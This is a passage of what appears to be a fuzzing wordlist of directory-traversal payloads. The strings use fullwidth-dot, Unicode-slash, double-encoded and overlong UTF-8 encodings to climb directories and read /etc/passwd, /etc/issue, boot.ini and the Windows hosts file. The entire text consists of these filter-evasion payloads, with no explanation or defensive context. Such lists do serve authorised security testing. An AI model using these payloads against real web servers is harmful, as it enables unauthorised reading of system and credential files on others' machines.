-%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215issue -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215issue -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%uff0e%uff0e%u2216etc%u2216passwd -%uff0e%uff0e%u2216etc%u2216issue -%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216issue -%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216issue -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216issue -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216issue -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc%u2216issue -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%uff0e%uff0e%uEFC8etc%uEFC8passwd -%uff0e%uff0e%uEFC8etc%uEFC8issue -%uff0e%uff0e%uEFC8boot.ini -%uff0e%uff0e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8passwd -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8issue -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8boot.ini -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8passwd -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8issue -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8boot.ini -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8passwd -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8issue -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8boot.ini -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8passwd -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8issue -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8boot.ini -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8passwd -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8etc%uEFC8issue -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8boot.ini -%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8%uff0e%uff0e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%uff0e%uff0e%uF025etc%uF025passwd -%uff0e%uff0e%uF025etc%uF025issue -%uff0e%uff0e%uF025boot.ini -%uff0e%uff0e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025passwd -%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025issue -%uff0e%uff0e%uF025%uff0e%uff0e%uF025boot.ini -%uff0e%uff0e%uF025%uff0e%uff0e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025passwd -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025issue -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025boot.ini -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025passwd -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025issue -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025boot.ini -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025passwd -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025issue -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025boot.ini -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025passwd -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025etc%uF025issue -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025boot.ini -%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025%uff0e%uff0e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%uff0e%uff0e%%32%%66etc%%32%%66passwd -%uff0e%uff0e%%32%%66etc%%32%%66issue -%uff0e%uff0e%%32%%66boot.ini -%uff0e%uff0e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66passwd -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66issue -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66boot.ini -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66passwd -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66issue -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66boot.ini -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66passwd -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66issue -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66boot.ini -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66passwd -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66issue -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66boot.ini -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66passwd -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66etc%%32%%66issue -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66boot.ini -%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66%uff0e%uff0e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%uff0e%uff0e%%35%%63etc%%35%%63passwd -%uff0e%uff0e%%35%%63etc%%35%%63issue -%uff0e%uff0e%%35%%63boot.ini -%uff0e%uff0e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63passwd -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63issue -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63boot.ini -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63passwd -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63issue -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63boot.ini -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63passwd -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63issue -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63boot.ini -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63passwd -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63issue -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63boot.ini -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63passwd -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63etc%%35%%63issue -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63boot.ini -%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63%uff0e%uff0e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd -%uff0e%uff0e%e0%80%afetc%e0%80%afissue -%uff0e%uff0e%e0%80%afboot.ini -%uff0e%uff0e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afissue -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afboot.ini -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afissue -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afboot.ini -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afissue -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afboot.ini -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afissue -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afboot.ini -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afetc%e0%80%afissue -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afboot.ini -%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%af%uff0e%uff0e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd -%uff0e%uff0e%25c1%259cetc%25c1%259cissue -%uff0e%uff0e%25c1%259cboot.ini -%uff0e%uff0e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cissue -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cboot.ini -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cissue -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cboot.ini -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cissue -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cboot.ini -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cissue -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cboot.ini -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cetc%25c1%259cissue -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cboot.ini -%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259c%uff0e%uff0e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd -%uff0e%uff0e%25c0%25afetc%25c0%25afissue -%uff0e%uff0e%25c0%25afboot.ini -%uff0e%uff0e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afissue -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afboot.ini -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afissue -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afboot.ini -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afissue -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afboot.ini -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afissue -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afboot.ini -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afetc%25c0%25afissue -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afboot.ini -%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25af%uff0e%uff0e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd -%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afissue -%uff0e%uff0e%f0%80%80%afboot.ini -%uff0e%uff0e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%uff0e%uff0e%f0%80%80%af%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd 